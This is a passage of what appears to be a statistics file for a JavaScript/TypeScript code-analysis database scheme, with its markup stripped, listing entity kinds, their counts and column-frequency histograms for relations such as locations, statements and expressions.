+@interface_typeexpr +1038 + + +@type_parameter +3463 + + +@plain_function_typeexpr +1674 + + +@local_namespace_access +4671 + + +@qualified_namespace_access +20 + + +@constructor_typeexpr +20 + + +@mapped_typeexpr +20 + + +@conditional_typeexpr +100 + + +@infer_typeexpr +100 + + +@comment +104947 + + +@any_type +1 + + +@string_type +1 + + +@number_type +1 + + +@union_type +1802 + + +@true_type +1 + + +@false_type +1 + + +@type_reference +12383 + + +@object_type +159099 + + +@canonical_type_variable_type +650 + + +@typeof_type +2903 + + +@void_type +1 + + +@undefined_type +1 + + +@null_type +1 + + +@never_type +1 + + +@plain_symbol_type +1 + + +@objectkeyword_type +1 + + +@intersection_type +369 + + +@tuple_type +307 + + +@lexical_type_variable_type +50 + + +@this_type +2731 + + +@number_literal_type +1244 + + +@string_literal_type +30638 + + +@unknown_type +100 + + +@bigint_type +100 + + +@bigint_literal_type +100 + + +@unique_symbol_type +100 + + +@root_symbol +2385 + + +@member_symbol +7223 + + +@other_symbol +584 + + +@function_signature_type +34698 + + +@constructor_signature_type +2646 + + +@slashslash_comment +76841 + + +@slashstar_comment +8834 + + +@doc_comment +19270 + + +@html_comment_start +1 + + +@htmlcommentend +1 + + +@line +1622184 + + +@js_parse_error +8 + + +@regexpterm +33197 + + +@regexp_alt +641 + + +@regexp_seq +3371 + + +@regexp_caret +826 + + +@regexp_dollar +637 + + +@regexp_wordboundary +99 + + +@regexp_nonwordboundary +3 + + +@regexp_positive_lookahead +15 + + +@regexp_negative_lookahead +12 + + +@regexp_star +1057 + + +@regexp_plus +1067 + + +@regexp_opt +478 + + +@regexp_range +146 + + +@regexp_dot +445 + + +@regexp_group +1692 + + +@regexp_normal_constant +15489 + + +@regexp_hex_escape +59 + + +@regexp_unicode_escape +264 + + +@regexp_dec_escape +7 + + +@regexp_oct_escape +1 + + +@regexp_ctrl_escape +599 + + +@regexp_char_class_escape +1573 + + +@regexp_id_escape +2613 + + +@regexp_backref +11 + + +@regexp_char_class +1473 + + 
+@regexp_char_range +619 + + +@regexp_positive_lookbehind +15 + + +@regexp_negative_lookbehind +12 + + +@regexp_unicode_property_escape +12 + + +@regexp_parse_error +122 + + +@token +8770869 + + +@token_eof +5312 + + +@token_null_literal +15526 + + +@token_boolean_literal +31654 + + +@token_numeric_literal +557620 + + +@token_string_literal +269555 + + +@token_regular_expression +2773 + + +@token_identifier +2268328 + + +@token_keyword +551767 + + +@token_punctuator +5068334 + + +@json_value +1643352 + + +@json_null +24 + + +@json_boolean +654 + + +@json_number +273113 + + +@json_string +752355 + + +@json_array +175925 + + +@json_object +441281 + + +@json_parse_error +1 + + +@entry_node +121542 + + +@exit_node +121542 + + +@guard_node +177785 + + +@jsdoc +19270 + + +@falsy_guard +86336 + + +@truthy_guard +91449 + + +@jsdoc_tag +29323 + + +@jsdoc_type_expr +22481 + + +@jsdoc_any_type_expr +292 + + +@jsdoc_null_type_expr +35 + + +@jsdoc_undefined_type_expr +287 + + +@jsdoc_unknown_type_expr +27 + + +@jsdoc_void_type_expr +8 + + +@jsdoc_named_type_expr +18639 + + +@jsdoc_applied_type_expr +303 + + +@jsdoc_nullable_type_expr +310 + + +@jsdoc_non_nullable_type_expr +536 + + +@jsdoc_record_type_expr +91 + + +@jsdoc_array_type_expr +19 + + +@jsdoc_union_type_expr +668 + + +@jsdoc_function_type_expr +316 + + +@jsdoc_optional_type_expr +895 + + +@jsdoc_rest_type_expr +55 + + +@jsdoc_error +1658 + + +@yaml_node +885 + + +@yaml_scalar_node +700 + + +@yaml_mapping_node +149 + + +@yaml_sequence_node +35 + + +@yaml_alias_node +1 + + +@yaml_error +1 + + +@jsx_element +1090 + + +@jsx_qualified_name +100 + + +@jsx_empty_expr +100 + + +@await_expr +100 + + +@function_sent_expr +100 + + +@decorator +100 + + +@bind_expr +100 + + +@bigint_literal +100 + + +@nullishcoalescing_expr +100 + + +@e4x_xml_anyname +100 + + +@e4x_xml_static_attribute_selector +100 + + +@e4x_xml_dynamic_attribute_selector +100 + + +@e4x_xml_filter_expression +100 + + +@e4x_xml_static_qualident +100 + + 
+@e4x_xml_dynamic_qualident +100 + + +@e4x_xml_dotdotexpr +100 + + +@xmldtd +1 + + +@xmlelement +1270313 + + +@xmlattribute +1202020 + + +@xmlnamespace +4185 + + +@xmlcomment +26812 + + +@xmlcharacters +439958 + + +@optionalchainable +100 + + +@nullishcoalescing_expr +100 + + +@config +69795 + + +@configName +69794 + + +@configValue +69691 + + + + + +locations_default +id +15664049 + + +id +15664049 + + +file +6457 + + +beginLine +277405 + + +beginColumn +117878 + + +endLine +277405 + + +endColumn +117868 + + + + +id +file + + +12 + + +1 +2 +15664049 + + + + + + +id +beginLine + + +12 + + +1 +2 +15664049 + + + + + + +id +beginColumn + + +12 + + +1 +2 +15664049 + + + + + + +id +endLine + + +12 + + +1 +2 +15664049 + + + + + + +id +endColumn + + +12 + + +1 +2 +15664049 + + + + + + +file +id + + +12 + + +1 +2 +674 + + +2 +28 +501 + + +28 +105 +488 + + +105 +211 +488 + + +211 +335 +490 + + +335 +477 +485 + + +477 +637 +488 + + +637 +856 +486 + + +856 +1141 +485 + + +1141 +1602 +485 + + +1604 +2336 +486 + + +2336 +4472 +485 + + +4472 +2368854 +416 + + + + + + +file +beginLine + + +12 + + +1 +2 +674 + + +2 +13 +509 + + +13 +23 +513 + + +23 +35 +516 + + +35 +50 +504 + + +50 +69 +506 + + +69 +92 +489 + + +92 +124 +504 + + +124 +165 +487 + + +165 +230 +490 + + +230 +357 +491 + + +357 +737 +485 + + +737 +277406 +289 + + + + + + +file +beginColumn + + +12 + + +1 +2 +674 + + +2 +12 +491 + + +12 +32 +495 + + +32 +46 +510 + + +46 +56 +498 + + +56 +62 +488 + + +62 +67 +500 + + +67 +71 +477 + + +71 +75 +583 + + +75 +78 +497 + + +78 +80 +403 + + +80 +82 +543 + + +82 +117856 +298 + + + + + + +file +endLine + + +12 + + +1 +2 +674 + + +2 +13 +509 + + +13 +23 +509 + + +23 +35 +520 + + +35 +50 +504 + + +50 +69 +506 + + +69 +92 +489 + + +92 +124 +504 + + +124 +165 +487 + + +165 +230 +490 + + +230 +357 +491 + + +357 +737 +485 + + +737 +277406 +289 + + + + + + +file +endColumn + + +12 + + +1 +2 +682 + + +2 +18 +501 + + +18 +36 +487 + + +36 +51 +513 + + +51 +61 +532 + + +61 +67 +508 + + +67 
+72 +568 + + +72 +75 +444 + + +75 +78 +514 + + +78 +80 +484 + + +80 +81 +283 + + +81 +82 +579 + + +82 +117837 +362 + + + + + + +beginLine +id + + +12 + + +1 +6 +666 + + +7 +8 +116499 + + +8 +14 +19181 + + +14 +15 +29298 + + +15 +19 +25329 + + +19 +24 +17273 + + +24 +29 +22410 + + +29 +56 +21150 + + +56 +242 +20830 + + +242 +134468 +4769 + + + + + + +beginLine +file + + +12 + + +1 +2 +117975 + + +2 +3 +120803 + + +3 +8 +21079 + + +8 +6458 +17548 + + + + + + +beginLine +beginColumn + + +12 + + +1 +5 +667 + + +5 +6 +116499 + + +6 +11 +19126 + + +11 +12 +32612 + + +12 +15 +18313 + + +15 +17 +18964 + + +17 +21 +21845 + + +21 +31 +21197 + + +31 +64 +20988 + + +64 +94454 +7194 + + + + + + +beginLine +endLine + + +12 + + +1 +2 +238980 + + +2 +3 +22312 + + +3 +890 +16113 + + + + + + +beginLine +endColumn + + +12 + + +1 +5 +667 + + +5 +6 +116499 + + +6 +12 +20939 + + +12 +13 +28687 + + +13 +16 +19707 + + +16 +18 +20057 + + +18 +22 +21035 + + +22 +33 +21605 + + +33 +69 +21089 + + +69 +94455 +7120 + + + + + + +beginColumn +id + + +12 + + +1 +2 +5117 + + +2 +3 +9246 + + +3 +4 +13440 + + +4 +5 +15857 + + +5 +6 +13813 + + +6 +7 +11696 + + +7 +8 +8777 + + +8 +9 +6887 + + +9 +11 +9723 + + +11 +14 +10392 + + +14 +20 +9364 + + +20 +2248970 +3566 + + + + + + +beginColumn +file + + +12 + + +1 +2 +68610 + + +2 +3 +15842 + + +3 +4 +7965 + + +4 +5 +9221 + + +5 +6 +8014 + + +6 +6458 +8226 + + + + + + +beginColumn +beginLine + + +12 + + +1 +2 +6868 + + +2 +3 +15317 + + +3 +4 +24725 + + +4 +5 +25386 + + +5 +6 +10178 + + +6 +7 +6239 + + +7 +9 +10825 + + +9 +11 +9294 + + +11 +1255 +8841 + + +1258 +277405 +205 + + + + + + +beginColumn +endLine + + +12 + + +1 +2 +6868 + + +2 +3 +15317 + + +3 +4 +24725 + + +4 +5 +25386 + + +5 +6 +10175 + + +6 +7 +6232 + + +7 +9 +10827 + + +9 +11 +9299 + + +11 +1227 +8842 + + +1256 +277405 +207 + + + + + + +beginColumn +endColumn + + +12 + + +1 +2 +24039 + + +2 +3 +21662 + + +3 +4 +22809 + + +4 +5 +17118 + + +5 +6 +12038 + + +6 +7 +7768 + + +7 +10 +9297 + + +10 
+1064 +3147 + + + + + + +endLine +id + + +12 + + +1 +6 +666 + + +7 +8 +116499 + + +8 +14 +18715 + + +14 +15 +30262 + + +15 +19 +24946 + + +19 +24 +17066 + + +24 +29 +22451 + + +29 +56 +21060 + + +56 +237 +20821 + + +237 +134470 +4919 + + + + + + +endLine +file + + +12 + + +1 +2 +117975 + + +2 +3 +120803 + + +3 +8 +21076 + + +8 +6458 +17551 + + + + + + +endLine +beginLine + + +12 + + +1 +2 +243883 + + +2 +4 +23431 + + +4 +71 +10091 + + + + + + +endLine +beginColumn + + +12 + + +1 +5 +667 + + +5 +6 +116499 + + +6 +11 +19057 + + +11 +12 +32046 + + +12 +15 +18779 + + +15 +17 +18710 + + +17 +21 +21785 + + +21 +31 +21103 + + +31 +63 +20930 + + +63 +94454 +7829 + + + + + + +endLine +endColumn + + +12 + + +1 +5 +667 + + +5 +6 +116499 + + +6 +12 +21177 + + +12 +13 +28718 + + +13 +16 +19585 + + +16 +18 +21210 + + +18 +23 +23344 + + +23 +35 +21013 + + +35 +80 +20938 + + +80 +94454 +4254 + + + + + + +endColumn +id + + +12 + + +1 +2 +4439 + + +2 +3 +8489 + + +3 +4 +12884 + + +4 +5 +16048 + + +5 +6 +15554 + + +6 +7 +12546 + + +7 +8 +9231 + + +8 +9 +6405 + + +9 +11 +9266 + + +11 +14 +10367 + + +14 +20 +9186 + + +20 +489713 +3453 + + + + + + +endColumn +file + + +12 + + +1 +2 +68569 + + +2 +3 +15919 + + +3 +4 +7876 + + +4 +5 +9221 + + +5 +6 +8062 + + +6 +6458 +8221 + + + + + + +endColumn +beginLine + + +12 + + +1 +2 +6848 + + +2 +3 +15273 + + +3 +4 +24807 + + +4 +5 +25343 + + +5 +6 +10180 + + +6 +7 +6269 + + +7 +9 +10857 + + +9 +11 +9251 + + +11 +1768 +8841 + + +1780 +212575 +199 + + + + + + +endColumn +beginColumn + + +12 + + +1 +2 +15842 + + +2 +3 +27460 + + +3 +4 +26707 + + +4 +5 +18639 + + +5 +6 +11518 + + +6 +8 +10766 + + +8 +265 +6936 + + + + + + +endColumn +endLine + + +12 + + +1 +2 +6850 + + +2 +3 +15271 + + +3 +4 +24807 + + +4 +5 +25343 + + +5 +6 +10180 + + +6 +7 +6269 + + +7 +9 +10858 + + +9 +11 +9252 + + +11 +1789 +8841 + + +1795 +212360 +197 + + + + + + + + +numlines +122044 + + +element_id +122044 + + +num_lines +1136 + + +num_code +939 + + +num_comment +418 + + + + 
+element_id +num_lines + + +12 + + +1 +2 +122044 + + + + + + +element_id +num_code + + +12 + + +1 +2 +122044 + + + + + + +element_id +num_comment + + +12 + + +1 +2 +122044 + + + + + + +num_lines +element_id + + +12 + + +1 +2 +399 + + +2 +3 +144 + + +3 +4 +97 + + +4 +6 +91 + + +6 +9 +86 + + +9 +15 +90 + + +15 +36 +86 + + +36 +174 +86 + + +175 +21589 +57 + + + + + + +num_lines +num_code + + +12 + + +1 +2 +444 + + +2 +3 +140 + + +3 +4 +95 + + +4 +6 +87 + + +6 +9 +85 + + +9 +14 +88 + + +14 +24 +90 + + +24 +33 +89 + + +33 +38 +18 + + + + + + +num_lines +num_comment + + +12 + + +1 +2 +444 + + +2 +3 +140 + + +3 +4 +94 + + +4 +6 +92 + + +6 +9 +90 + + +9 +14 +90 + + +14 +20 +89 + + +20 +27 +89 + + +27 +30 +8 + + + + + + +num_code +element_id + + +12 + + +1 +2 +317 + + +2 +3 +125 + + +3 +4 +67 + + +4 +5 +61 + + +5 +8 +67 + + +8 +12 +73 + + +12 +26 +72 + + +26 +69 +71 + + +69 +1540 +71 + + +1747 +22000 +15 + + + + + + +num_code +num_lines + + +12 + + +1 +2 +349 + + +2 +3 +118 + + +3 +4 +77 + + +4 +6 +76 + + +6 +10 +84 + + +10 +19 +78 + + +19 +31 +79 + + +31 +44 +73 + + +44 +52 +5 + + + + + + +num_code +num_comment + + +12 + + +1 +2 +347 + + +2 +3 +121 + + +3 +4 +79 + + +4 +6 +74 + + +6 +9 +74 + + +9 +16 +80 + + +16 +23 +72 + + +23 +31 +76 + + +31 +40 +16 + + + + + + +num_comment +element_id + + +12 + + +1 +2 +147 + + +2 +3 +67 + + +3 +4 +26 + + +4 +5 +26 + + +5 +7 +32 + + +7 +12 +34 + + +12 +32 +34 + + +33 +135 +32 + + +150 +93795 +20 + + + + + + +num_comment +num_lines + + +12 + + +1 +2 +171 + + +2 +3 +57 + + +3 +4 +32 + + +4 +5 +24 + + +5 +8 +33 + + +8 +18 +35 + + +19 +47 +32 + + +52 +253 +33 + + +362 +363 +1 + + + + + + +num_comment +num_code + + +12 + + +1 +2 +174 + + +2 +3 +54 + + +3 +4 +33 + + +4 +5 +22 + + +5 +8 +33 + + +8 +18 +36 + + +19 +47 +32 + + +51 +230 +32 + + +232 +346 +2 + + + + + + + + +files +id +6457 + + +id +6457 + + +name +6457 + + + + +id +name + + +12 + + +1 +2 +6457 + + + + + + +name +id + + +12 + + +1 +2 +6457 + + + + + + + + +folders +id +1590 + + 
+id +1590 + + +name +1590 + + + + +id +name + + +12 + + +1 +2 +1590 + + + + + + +name +id + + +12 + + +1 +2 +1590 + + + + + + + + +containerparent +child +8046 + + +parent +1590 + + +child +8046 + + + + +parent +child + + +12 + + +1 +2 +525 + + +2 +3 +326 + + +3 +4 +207 + + +4 +5 +128 + + +5 +7 +138 + + +7 +11 +132 + + +11 +53 +120 + + +60 +335 +14 + + + + + + +child +parent + + +12 + + +1 +2 +8046 + + + + + + + + +externalData +5684 + + +id +950 + + +path +3 + + +column +6 + + +value +790 + + + + +id +path + + +12 + + +1 +2 +950 + + + + + + +id +column + + +12 + + +2 +3 +4 + + +6 +7 +946 + + + + + + +id +value + + +12 + + +2 +6 +8 + + +6 +7 +942 + + + + + + +path +id + + +12 + + +4 +5 +1 + + +72 +73 +1 + + +874 +875 +1 + + + + + + +path +column + + +12 + + +2 +3 +1 + + +6 +7 +2 + + + + + + +path +value + + +12 + + +8 +9 +1 + + +86 +87 +1 + + +722 +723 +1 + + + + + + +column +id + + +12 + + +946 +947 +4 + + +950 +951 +2 + + + + + + +column +path + + +12 + + +2 +3 +4 + + +3 +4 +2 + + + + + + +column +value + + +12 + + +2 +3 +1 + + +6 +7 +1 + + +31 +32 +1 + + +93 +94 +1 + + +117 +118 +1 + + +620 +621 +1 + + + + + + +value +id + + +12 + + +1 +2 +478 + + +2 +3 +132 + + +3 +5 +69 + + +5 +16 +61 + + +16 +928 +50 + + + + + + +value +path + + +12 + + +1 +2 +764 + + +2 +3 +26 + + + + + + +value +column + + +12 + + +1 +2 +711 + + +2 +3 +79 + + + + + + + + +sourceLocationPrefix +1 + + +prefix +1 + + + + + +toplevels +id +5320 + + +id +5320 + + +kind +4 + + + + +id +kind + + +12 + + +1 +2 +5320 + + + + + + +kind +id + + +12 + + +3 +4 +1 + + +31 +32 +1 + + +86 +87 +1 + + +5200 +5201 +1 + + + + + + + + +is_externs +44 + + +toplevel +44 + + + + + +is_instantiated +5 + + +decl +5 + + + + + +has_declare_keyword +66 + + +stmt +66 + + + + + +has_asserts_keyword +66 + + +node +66 + + + + + +is_abstract_member +66 + + +id +66 + + + + + +has_public_keyword +9297 + + +id +9297 + + + + + +has_private_keyword +11391 + + +id +11391 + + + + + +has_protected_keyword +1048 + + +id +1048 + + + 
+ + +has_readonly_keyword +2338 + + +id +2338 + + + + + +has_type_keyword +1000 + + +id +1000 + + + + + +is_optional_member +3668 + + +id +3668 + + + + + +has_definite_assignment_assertion +100 + + +id +100 + + + + + +is_optional_parameter_declaration +3966 + + +parameter +3966 + + + + + +parameter_fields +2693 + + +field +2693 + + +constructor +1020 + + +param_index +20 + + + + +field +constructor + + +12 + + +1 +2 +2693 + + + + + + +field +param_index + + +12 + + +1 +2 +2693 + + + + + + +constructor +field + + +12 + + +1 +2 +439 + + +2 +3 +233 + + +3 +4 +118 + + +4 +5 +78 + + +5 +7 +83 + + +7 +21 +69 + + + + + + +constructor +param_index + + +12 + + +1 +2 +439 + + +2 +3 +233 + + +3 +4 +118 + + +4 +5 +78 + + +5 +7 +83 + + +7 +21 +69 + + + + + + +param_index +field + + +12 + + +1 +2 +1 + + +2 +3 +1 + + +3 +4 +1 + + +4 +5 +1 + + +5 +6 +1 + + +6 +7 +1 + + +8 +9 +1 + + +10 +11 +1 + + +15 +16 +1 + + +22 +23 +1 + + +29 +30 +1 + + +36 +37 +1 + + +48 +49 +1 + + +69 +70 +1 + + +104 +105 +1 + + +152 +153 +1 + + +230 +231 +1 + + +348 +349 +1 + + +581 +582 +1 + + +1020 +1021 +1 + + + + + + +param_index +constructor + + +12 + + +1 +2 +1 + + +2 +3 +1 + + +3 +4 +1 + + +4 +5 +1 + + +5 +6 +1 + + +6 +7 +1 + + +8 +9 +1 + + +10 +11 +1 + + +15 +16 +1 + + +22 +23 +1 + + +29 +30 +1 + + +36 +37 +1 + + +48 +49 +1 + + +69 +70 +1 + + +104 +105 +1 + + +152 +153 +1 + + +230 +231 +1 + + +348 +349 +1 + + +581 +582 +1 + + +1020 +1021 +1 + + + + + + + + +is_const_enum +62 + + +id +62 + + + + + +is_abstract_class +116 + + +id +116 + + + + + +typeexprs +54050 + + +id +54050 + + +kind +6 + + +parent +29264 + + +idx +26 + + +tostring +3278 + + + + +id +kind + + +12 + + +1 +2 +54050 + + + + + + +id +parent + + +12 + + +1 +2 +54050 + + + + + + +id +idx + + +12 + + +1 +2 +54050 + + + + + + +id +tostring + + +12 + + +1 +2 +54050 + + + + + + +kind +id + + +12 + + +3 +4 +1 + + +4 +5 +1 + + +733 +734 +1 + + +2513 +2514 +1 + + +25306 +25307 +1 + + +25491 +25492 +1 + + + + + + +kind +parent + + +12 + + +3 +4 
+1 + + +4 +5 +1 + + +733 +734 +1 + + +2513 +2514 +1 + + +16661 +16662 +1 + + +17601 +17602 +1 + + + + + + +kind +idx + + +12 + + +1 +2 +2 + + +3 +4 +1 + + +4 +5 +1 + + +19 +20 +1 + + +25 +26 +1 + + + + + + +kind +tostring + + +12 + + +2 +3 +1 + + +3 +4 +1 + + +9 +10 +1 + + +242 +243 +1 + + +2075 +2076 +1 + + +2322 +2323 +1 + + + + + + +parent +id + + +12 + + +1 +2 +15321 + + +2 +3 +7887 + + +3 +4 +3725 + + +4 +9 +2229 + + +9 +24 +102 + + + + + + +parent +kind + + +12 + + +1 +2 +21285 + + +2 +3 +7707 + + +3 +4 +272 + + + + + + +parent +idx + + +12 + + +1 +2 +15321 + + +2 +3 +7887 + + +3 +4 +3725 + + +4 +9 +2229 + + +9 +24 +102 + + + + + + +parent +tostring + + +12 + + +1 +2 +16315 + + +2 +3 +8432 + + +3 +4 +3126 + + +4 +22 +1391 + + + + + + +idx +id + + +12 + + +1 +2 +2 + + +3 +4 +2 + + +4 +7 +2 + + +10 +12 +2 + + +13 +22 +2 + + +27 +38 +2 + + +54 +61 +2 + + +101 +212 +2 + + +356 +530 +2 + + +859 +1645 +2 + + +2513 +2519 +2 + + +3330 +7198 +2 + + +15305 +19237 +2 + + + + + + +idx +kind + + +12 + + +1 +2 +7 + + +2 +3 +14 + + +3 +4 +2 + + +4 +5 +3 + + + + + + +idx +parent + + +12 + + +1 +2 +2 + + +3 +4 +2 + + +4 +7 +2 + + +10 +12 +2 + + +13 +22 +2 + + +27 +38 +2 + + +54 +61 +2 + + +101 +212 +2 + + +356 +530 +2 + + +859 +1645 +2 + + +2513 +2519 +2 + + +3330 +7198 +2 + + +15305 +19237 +2 + + + + + + +idx +tostring + + +12 + + +1 +2 +2 + + +3 +4 +2 + + +4 +6 +2 + + +9 +10 +2 + + +12 +17 +2 + + +18 +26 +2 + + +28 +31 +2 + + +37 +44 +2 + + +60 +71 +2 + + +108 +196 +2 + + +395 +667 +2 + + +746 +978 +2 + + +1522 +2076 +2 + + + + + + +tostring +id + + +12 + + +1 +2 +1085 + + +2 +3 +627 + + +3 +4 +344 + + +4 +5 +322 + + +5 +7 +292 + + +7 +12 +260 + + +12 +45 +247 + + +45 +7788 +101 + + + + + + +tostring +kind + + +12 + + +1 +2 +1903 + + +2 +3 +1375 + + + + + + +tostring +parent + + +12 + + +1 +2 +1097 + + +2 +3 +631 + + +3 +4 +341 + + +4 +5 +327 + + +5 +7 +292 + + +7 +12 +253 + + +12 +48 +246 + + +48 +6190 +91 + + + + + + +tostring +idx + + +12 + + +1 +2 +1450 + + +2 +3 +939 + 
+ +3 +4 +481 + + +4 +6 +289 + + +6 +19 +119 + + + + + + + + +is_for_await_of +1 + + +forof +1 + + + + + +is_module +21 + + +tl +21 + + + + + +is_es2015_module +21 + + +tl +21 + + + + + +is_closure_module +21 + + +tl +21 + + + + + +toplevel_parent_xml_node +43 + + +toplevel +43 + + +xmlnode +43 + + + + +toplevel +xmlnode + + +12 + + +1 +2 +43 + + + + + + +xmlnode +toplevel + + +12 + + +1 +2 +43 + + + + + + + + +xml_element_parent_expression +1 + + +xmlnode +1 + + +expression +1 + + +index +1 + + + + +xmlnode +expression + + +12 + + +1 +2 +1 + + + + + + +xmlnode +index + + +12 + + +1 +2 +1 + + + + + + +expression +xmlnode + + +12 + + +1 +2 +1 + + + + + + +expression +index + + +12 + + +1 +2 +1 + + + + + + +index +xmlnode + + +12 + + +1 +2 +1 + + + + + + +index +expression + + +12 + + +1 +2 +1 + + + + + + + + +is_nodejs +12 + + +tl +12 + + + + + +stmts +id +1096691 + + +id +1096691 + + +kind +31 + + +parent +412140 + + +idx +152947 + + +tostring +284956 + + + + +id +kind + + +12 + + +1 +2 +1096691 + + + + + + +id +parent + + +12 + + +1 +2 +1096691 + + + + + + +id +idx + + +12 + + +1 +2 +1096691 + + + + + + +id +tostring + + +12 + + +1 +2 +1096691 + + + + + + +kind +id + + +12 + + +1 +2 +3 + + +3 +5 +2 + + +5 +9 +2 + + +31 +42 +2 + + +61 +552 +2 + + +1118 +1137 +2 + + +1272 +1316 +2 + + +1316 +1379 +2 + + +1471 +1570 +2 + + +1642 +2306 +2 + + +3120 +5386 +2 + + +8674 +10150 +2 + + +16771 +48210 +2 + + +68214 +105607 +2 + + +204994 +610341 +2 + + + + + + +kind +parent + + +12 + + +1 +2 +4 + + +3 +5 +2 + + +5 +6 +2 + + +35 +59 +2 + + +298 +424 +2 + + +738 +1157 +2 + + +1253 +1263 +2 + + +1271 +1321 +2 + + +1495 +1568 +2 + + +1642 +2306 +2 + + +2999 +4416 +2 + + +4734 +10123 +2 + + +48139 +48347 +2 + + +50857 +162082 +2 + + +191077 +191078 +1 + + + + + + +kind +idx + + +12 + + +1 +2 +3 + + +2 +3 +2 + + +3 +4 +2 + + +8 +9 +2 + + +10 +12 +2 + + +16 +22 +2 + + +28 +32 +2 + + +36 +37 +2 + + +39 +51 +2 + + +54 +63 +2 + + +65 +67 +2 + + +116 +118 +2 + + +122 +138 +2 + + +251 
+1564 +2 + + +1967 +152946 +2 + + + + + + +kind +tostring + + +12 + + +1 +2 +5 + + +2 +3 +2 + + +4 +11 +2 + + +12 +17 +2 + + +88 +104 +2 + + +147 +168 +2 + + +239 +296 +2 + + +356 +428 +2 + + +591 +705 +2 + + +811 +829 +2 + + +1092 +2254 +2 + + +2665 +10292 +2 + + +18023 +21916 +2 + + +43911 +180066 +2 + + + + + + +parent +id + + +12 + + +1 +2 +265890 + + +2 +3 +69435 + + +3 +4 +25109 + + +4 +8 +34966 + + +8 +152946 +16740 + + + + + + +parent +kind + + +12 + + +1 +2 +319546 + + +2 +3 +67918 + + +3 +23 +24676 + + + + + + +parent +idx + + +12 + + +1 +2 +265890 + + +2 +3 +69435 + + +3 +4 +25109 + + +4 +8 +34966 + + +8 +152946 +16740 + + + + + + +parent +tostring + + +12 + + +1 +2 +275359 + + +2 +3 +62818 + + +3 +4 +25781 + + +4 +8 +34293 + + +8 +19511 +13889 + + + + + + +idx +id + + +12 + + +1 +2 +149939 + + +2 +220361 +3008 + + + + + + +idx +kind + + +12 + + +1 +2 +149940 + + +2 +28 +3007 + + + + + + +idx +parent + + +12 + + +1 +2 +149939 + + +2 +220361 +3008 + + + + + + +idx +tostring + + +12 + + +1 +2 +149939 + + +2 +88922 +3008 + + + + + + +tostring +id + + +12 + + +1 +2 +186537 + + +2 +3 +48494 + + +3 +5 +24651 + + +5 +37 +21526 + + +37 +72175 +3748 + + + + + + +tostring +kind + + +12 + + +1 +2 +284895 + + +2 +4 +61 + + + + + + +tostring +parent + + +12 + + +1 +2 +195596 + + +2 +3 +45562 + + +3 +5 +23127 + + +5 +66340 +20671 + + + + + + +tostring +idx + + +12 + + +1 +2 +225945 + + +2 +3 +33948 + + +3 +13 +21496 + + +13 +903 +3567 + + + + + + + + +stmt_containers +1096691 + + +stmt +1096691 + + +container +120740 + + + + +stmt +container + + +12 + + +1 +2 +1096691 + + + + + + +container +stmt + + +12 + + +1 +2 +6778 + + +2 +3 +35010 + + +3 +4 +16178 + + +4 +5 +12184 + + +5 +6 +9476 + + +6 +7 +7569 + + +7 +9 +10084 + + +9 +13 +10057 + + +13 +27 +9196 + + +27 +152947 +4208 + + + + + + + + +jump_targets +11791 + + +jump +11791 + + +target +4873 + + + + +jump +target + + +12 + + +1 +2 +11791 + + + + + + +target +jump + + +12 + + +1 +2 +2542 + + +2 +3 +1106 + + +3 +4 
+505 + + +4 +6 +410 + + +6 +260 +310 + + + + + + + + +exprs +id +5495305 + + +id +5495305 + + +kind +85 + + +parent +3130204 + + +idx +17698 + + +tostring +834491 + + + + +id +kind + + +12 + + +1 +2 +5495305 + + + + + + +id +parent + + +12 + + +1 +2 +5495305 + + + + + + +id +idx + + +12 + + +1 +2 +5495305 + + + + + + +id +tostring + + +12 + + +1 +2 +5495305 + + + + + + +kind +id + + +12 + + +1 +4 +7 + + +4 +45 +7 + + +50 +97 +7 + + +108 +458 +7 + + +503 +824 +7 + + +1135 +2497 +7 + + +2527 +5439 +7 + + +5655 +10255 +7 + + +10789 +15893 +7 + + +17758 +42854 +7 + + +50958 +130844 +7 + + +245084 +722374 +7 + + +1295408 +1295409 +1 + + + + + + +kind +parent + + +12 + + +1 +3 +7 + + +3 +45 +7 + + +47 +93 +7 + + +106 +407 +7 + + +457 +809 +7 + + +1108 +2420 +7 + + +2502 +5349 +7 + + +5453 +10133 +7 + + +10658 +15697 +7 + + +16273 +36888 +7 + + +41849 +128642 +7 + + +199566 +722374 +7 + + +1171898 +1171899 +1 + + + + + + +kind +idx + + +12 + + +1 +2 +7 + + +2 +3 +12 + + +3 +4 +11 + + +4 +5 +7 + + +5 +6 +7 + + +6 +7 +3 + + +7 +8 +7 + + +8 +11 +6 + + +12 +18 +7 + + +20 +64 +7 + + +82 +395 +7 + + +431 +13375 +4 + + + + + + +kind +tostring + + +12 + + +1 +2 +7 + + +2 +6 +7 + + +8 +37 +7 + + +38 +126 +7 + + +142 +304 +7 + + +358 +721 +7 + + +811 +1485 +7 + + +1523 +2918 +7 + + +3305 +5078 +7 + + +5422 +9940 +7 + + +10536 +40606 +7 + + +46227 +123090 +7 + + +128754 +128755 +1 + + + + + + +parent +id + + +12 + + +1 +2 +1100280 + + +2 +3 +1876078 + + +3 +17692 +153846 + + + + + + +parent +kind + + +12 + + +1 +2 +1300246 + + +2 +3 +1747609 + + +3 +8 +82349 + + + + + + +parent +idx + + +12 + + +1 +2 +1100280 + + +2 +3 +1876078 + + +3 +17692 +153846 + + + + + + +parent +tostring + + +12 + + +1 +2 +1108803 + + +2 +3 +1870864 + + +3 +17526 +150537 + + + + + + +idx +id + + +12 + + +1 +2 +4092 + + +2 +3 +1365 + + +3 +4 +1995 + + +4 +5 +283 + + +5 +6 +1681 + + +6 +7 +5909 + + +7 +10 +1344 + + +10 +3049605 +1029 + + + + + + +idx +kind + + +12 + + +1 +2 +10648 + + +2 +3 +6398 + + +3 +83 
+652 + + + + + + +idx +parent + + +12 + + +1 +2 +4092 + + +2 +3 +1365 + + +3 +4 +1995 + + +4 +5 +283 + + +5 +6 +1681 + + +6 +7 +5909 + + +7 +10 +1344 + + +10 +3049605 +1029 + + + + + + +idx +tostring + + +12 + + +1 +2 +4093 + + +2 +3 +1365 + + +3 +4 +2014 + + +4 +5 +1147 + + +5 +6 +1529 + + +6 +7 +5401 + + +7 +10 +1499 + + +10 +573348 +650 + + + + + + +tostring +id + + +12 + + +1 +2 +466570 + + +2 +3 +157949 + + +3 +4 +55443 + + +4 +6 +61411 + + +6 +17 +63412 + + +17 +128652 +29706 + + + + + + +tostring +kind + + +12 + + +1 +2 +772624 + + +2 +24 +61867 + + + + + + +tostring +parent + + +12 + + +1 +2 +467110 + + +2 +3 +158201 + + +3 +4 +55446 + + +4 +6 +61061 + + +6 +17 +63168 + + +17 +128642 +29505 + + + + + + +tostring +idx + + +12 + + +1 +2 +724438 + + +2 +3 +86524 + + +3 +7765 +23529 + + + + + + + + +literals +expr 